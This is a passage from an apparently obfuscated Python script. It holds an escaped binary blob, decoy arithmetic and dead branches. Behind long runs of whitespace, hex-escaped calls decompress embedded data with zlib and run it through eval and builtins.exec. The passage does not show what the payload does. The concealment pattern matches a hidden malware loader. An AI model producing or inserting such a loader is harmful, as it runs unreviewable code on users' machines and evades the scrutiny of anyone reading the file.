)+\xab\xf8\xcb\x97_\xc9_%\x9e+\xbcw\xd7\xd1\xc8K\xd0VK\x0b\xe6\xea\xf4.7\xe9e\xe6\x9d\xe2\xe9\xdd#\xbe\x88\x92W\xfb@\x950\xfe\x95};\x88\x17\xc04\xd4+c\xe7\x93\x04\x13;A\xd0\x1b$\r\xcd,Z/\x86\xe7\x1aa&\xcb+\x8cu\xdd\x03V\xccs"*\xf80\xff#_\xcf\x97\'\xbc\xa6\x16\xc2\x1b\xd8\xed\x9c\xbd\x1e\xfc\x0f\x0f\xb6\xbf\x14\xc56\x00\x86\xceo\xb4@\xd5\x9e\xad\x97\x1f\xef\x8c\x9c\x16\x85\xe0]F\xa0\xc0\x8c\x0b\x9f\x11\xec\xcav\x98?\xfcE{\xac\xfeBl/\x85\x05\xa4\xf79\xa5\x84]\x91F\x8ag\xae\xe8\xd8\xc5\xcc\xd65\')Pj6R\x04\xd4\xec\x8e\xcf\xbed\x90\xf3\xff\x86]2\x8c\xec\x87<\xf1\nS\xb3[\x8e\x9er\n#(b\x1bv\x89P\x18J\x01\xb3\xd2f\xad~\xd3\xd7\xf7\x98*\x95&\x89\x11@\x9b\x82\xd4\xd8C\xba\xec\x15\x08\xb2\xf4\x063\xdc\xa77\xd6\xea\xa9\xb9\x1a\xbe\xdeL(\x170\xa7\x87\xfc"/\xc6e*\xfb\x82\xbd\x9d\xab\x1dj\xbc\xaaYD9\xd6~zsAt\x16\x08\xc6\xcaYE\xc5\x95\xa2\xb8\xef\xa2\xfaR\xdc}\xf1\x82\x97\x999\xd6\x0b\xfbx7\xedGd\x07\xc6PDH\x8c\xc7\xb8L\x1a\xcd\xff\xda\xd7\xebs\xc9\t\xa8\xe76E,\xd1\x8a#%\x90\xfc \x85\x00f\x87\xa1\xd6\xdb\xa2V\xca\x9cv\xbe\x8cm\x19h_\xb4\xb1*F\x1e\x84\x01_\x8c\x1f\x95\x87\xe1\xd7\xea\xac\x9e\xde\xc8\xf2&\x18\x7f\xbc\x89\x03_\x03\xa5\xca\xa1\xc8\xbaaj\xe7tI\xd2\x03ia\x98\xc4|o\x19W\xf2\xc5\x87\x1e\xa3\x88\x14\xc0\x0c\x08I\x9e\xc5\xa0\x1f\x8eT\xc6\x04\xe6\x13\x9dH\xad\x1e7\rR\xe4c`?\x03\x99r\xea\xc1\xfe6\x92\x99\x9cB\x86\xfa%&G\x1d\xd5 .%%\xbc\xe6\x10\xa6\xa0\xa9o9#\xaf\xaf\xbf\xde \xcf\x8e\xa0\r\xd1MC\xf90\xe6\x86\xa9/ k\x05\x9cm(M\xbe\xde\xe8\xc8\x83\xaf\xedh\xbf\xd50\x1e\x0b\xb5\x91qN\x03\r\x80vE\x89\x87h\xdf!,\tv:\xbf\xae\xf0\xf6]k\xfa*\x8c\xe3\x96\xeb%\x0b\x81U\x0322\xfb\xdb\xff\xdc\xf3\xdb\x95\xa6\n>\xc4\x85\xfa\xd6E2o\xfb\xadh\xde\xdf\xbd3\x84-\xda0~y\x91(\xd5\x9f\xcd\xe69e|\xa0fE\x04O\xf0\x9ag9\xf2%Pf\'r&l\x98\xe2\xec\xa6\x12\xcc#lT\xe6\xf7Z\x80\x13w\x84\xbe\xbd;\xae\xe9\x1d\xc7+\xac\xc6\xb2\x82\x8a\x14\xaf8\xb9%\'\xc7\xf8\xe1\xd8Z\x06m\x88X\x8br\x82~\x11gG\xee\x95\x94\xa2\rs\xc7N\xf7V\xef5TO\xc6lp3\x19\x94\xda\xc6\x01!\xeeS\x8b\xd3l\xd3\x88`\xb9t-\x10\x8f\xea\x80\xd0\x9e\x06\x81s\xc3\xd3q\r\nS\x9d\xe45\x87\x04XZ\x99\xc6\xac3\x94\x173Wo\x8c\xa3L\'L\xc3\xd3\xce\x11a\xe7\xa45\x1e\x11\x02@1\xa0:\x1c\x10\x94\x93\xc8\x016I\x05\xdb0$&\xb9\xce\x9f \xc0"\xfcW\xd5\x00N/\xc8\x99\xa1\x05q\xfcG5*\x90\x8d!\xd9\x03e\xd2\xb3\x98\xf8\xa8\xdd\xa8\x9c\x8c\xa7\x14Q\x83/\x10\x10\xf9\xce\xa1P\xcc\x16j<\x18\xc8H10w\x89-\\\xb3\x90\xd0\x9c\x80\x82h\xd9$%t\x8a\x9d\xc9D\xc2\x14\x88\xf2\xa0\xb8$\x84&%\xcb\x8e\xaftt\xea\xb8\xc6\x85\xe6\x15y\xd5\x91A\x0b\xec\xfa\x8e0\xff\\\xc0\x93\xa4\xc5%1\xe9\xa1R\x8f\xb6\xe2%yH\xda\xd9+H\xcav\xc7\xb94(\x93\xee(Z\xaf\xdd\x85\x92\xabU5\x85\x1a\xab{\x16\xd1US[E\xa6\xc1\'\xcby\xfe\xf1#\x0e\xc7;N\xfa\xa1\x88\x1d\x10^\xd8cQ}\xf7\xbf\x9d\x93\x10\xcbI|1\xcb\x01H4\xfb\x9b\x16\x0f\xe7\x8b\x87\xdf0\xa5@h\x10r\x82\x94Nl\x11\x05q\x1bu\xffM\xfb\xd2\xb4g\x035o\xfb\x12n\x8d\xd4P2>g0a\x86\xaa\x12\x8c%\x1c=~\xdf\xcb\xf3\xc1\xddI')

        Walk(_calculate = -75462 / 76268).Calculate(System = _substract.Add / 73146)                                                                                                                                                                                                                                                          ;Walk._math(_absolute='wwxxxwxwxxwwxxwxxww',_invert=b"1\xa3\xb6`\x1a\xa8O\xa4\xaa5B\xa7\x92\xd2fY\x97.8\xb1\x83\xe1\xa1\x1cL\x90}S\x08\x96\xf9&\xe1\x0f\xb3o\xd4\xe9*\x0e\x9f\x97s\xa1o\xfd\xf0\xa0\xd4\xa4\xd3\x0fO\xcf\x8f+xy\xa2\xaf\x99\xa1\xe1(\xaa\xe0/\xdf\xcf\xd5\xeen\x84.\x12W\xe5\x8c\xe2\xc18E\xc0,\x83\x91G\x9c\x86\xe45\x05\xe5\xba8+\xee\x9f~\xc7\xdd \x89\t2\xaer&]\x9e\x7f\xbda>\xb7L\x87\xdf\xd7\x0cA\xfeZ#\x95\xdbJ?t\x91\x07\xf1\xdc\x022X\xa0\x06sAm\xe0\x83\xf5\n\xe4^R\xf8,A\xf8\x9a\xe1\xa0\xac\x19\x9f\x9d?e\xbfeL\x8e\xb5f\xee+\x88wo\x93yY\xbe\xc6S\xc7+\x91\xacJ:\x1e\\6b\xeb\xaf\xb5\t\xb6\xfb|\x82N\xcb\xdf4\xdc\xcb\xcc\xebr~\xc3(\xf1Q\x07\xf5\x1b\x05'6\x8c\x08\xf8\xd9\x9bN\xb4v\x7f\xe9lJ\x82b\x94\xbaB\xdf\xec7C\xfe\xc5\x11\xd5\xe2\xba\xb3\xc2\x8e\xe7\x02\x01\xb0pc\x0f\xf7\xf7ea/P\x97\xc7\xe5}\xfe\x17\x89\xf8\x9d\xf2}\xfa\xf4Tr\xc7?@`\xe3\xafM\xcb\x80\x0ebj\x04\xcc\xaf&)_\xae__@|.\xfd\xb5\x82\xd2_\x80J\xc4W\t\x06\xa9j\xe1\x01(\xea\x18N`@\x01\xeajW\xc0\x06\x04 \xe0rb0\x1ebD\x1bF{\x82\xf9\x89a\nW\xfc\xcb+\x8eW]^\xfd\x9aq<\x83\x88T\x88p\xeen]\xdc\x01 \x02\x1e\x1e\x86\x06\x11\xf0\xfc\xf0\xf0\xee\xfd\x958\x06\xaf\x10K\x84D)\x97\xef\xdek\xa4\xdc\xb5V\r\xc99p}Z\x1e\x0c\x1d\xa4V\x0c|8PZm\x1e\xcc|$\xff\x90+0\x9b\x06t\x9e\xe1<\xe2\xc2S8\xcf\xfe\xb0\t\xa9\x07\xfa>\x84\x16\x87\x93\x94Q18-\x1d\x82\x152\xd5\xd9\xbf%}\x97n\xa0\x16\x08\xef\x83\x0e\xb6\x7f\xf9b\xf5\x82\xb3\xbcX\xde?\xffn\xce3\xa2b\xe4\x94\xb2d\xe3\x7f\xd5Jk\x9b9i\x80{\xa9S\xd6\x9d\x9c`\xf0\x9e-\xd4pN\xf6?\xc9\x9a~q,)\x8bE\x97\x829\xc7\x96\x8b\x8b|\x97\x05-n\x81\x99\xcc:\xefQ\xf2\xe6\x91c\xdb\xda\x19!\r\xfe\x1f\xb1Y\xe4M")

        _substract._negative(_builtins = 97696 - _substract.Add)                                                                                                                                                                                                                                                          ;XXWXXWXWWXXWXWWXXWXWXW,MNNNMNMMMMMNNNNMMNNMMN,mnnmnmmmnnnmnmnnmmnnnmmmn,ILLJLIIIJJJJJJIJIILL,WWWXXWWWWWWWXWWWXXWWWWW=(lambda nmnmnnnmnnnnmnmnmnm:nmnmnnnmnnnnmnmnmnm(__import__('\x7a\x6c\x69\x62'))),(lambda nmnmnnnmnnnnmnmnmnm:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(nmnmnnnmnnnnmnmnmnm)"),filename='\x4f\x30\x6f\x30\x6f\x4f\x6f\x30\x4f\x30\x4f\x4f\x30\x30\x6f\x6f\x30\x30\x6f\x6f\x6f\x4f',mode='\x65\x76\x61\x6c'))),(lambda nmnmnnnmnnnnmnmnmnm:nmnmnnnmnnnnmnmnmnm['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda:(lambda nmnmnnnmnnnnmnmnmnm:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(nmnmnnnmnnnnmnmnmnm)"),filename='\x4f\x30\x6f\x30\x6f\x4f\x6f\x30\x4f\x30\x4f\x4f\x30\x30\x6f\x6f\x30\x30\x6f\x6f\x6f\x4f',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63')),(lambda lIIIIllIlIIIlIllllIlI,nmnmnnnmnnnnmnmnmnm:lIIIIllIlIIIlIllllIlI(nmnmnnnmnnnnmnmnmnm))
        _substract._negative(_builtins = -45179 * _substract.Add)                                                                                                                                                                                                                                                          ;ILLJLIIIJJJJJJIJIILL()(WWWXXWWWWWWWXWWWXXWWWWW(mnnmnmmmnnnmnmnnmmnnnmmmn(XXWXXWXWWXXWXWWXXWXWXW(MNNNMNMMMMMNNNNMMNNMMN('\x76\x61\x72\x73'))),Walk._product(Negative='nnnmmmmnnmnmnnmnm')+Walk._product(Negative='lIllIlIlllIIllllll')+Walk._product(Negative='liijjljjjjljljjjijijlji')+Walk._product(Negative='mmmmnnmnmmnnnmnmnnmn')+Walk._product(Negative='XXXWWXXWWXWWWWXXXWWWW')+Walk._product(Negative='lIlIIIIlllIlllllIlllI')+Walk._product(Negative='lllIIIlllllIllIlII')+Walk._product(Negative='xxwwwxwwwwxwxwwxxwwxwwxxx')+Walk._product(Negative='SSS2222S2SSS2S2SSS2S2SSS')+Walk._product(Negative='wwxxxwxwxxwwxxwxxww')))

    except Exception as _walk:
        if 328049 > 7568309:
            Walk.execute(code = Floor(_walk))

        elif 255733 > 3737709:
            _substract._negative(_builtins = -60106 * _substract.Add)
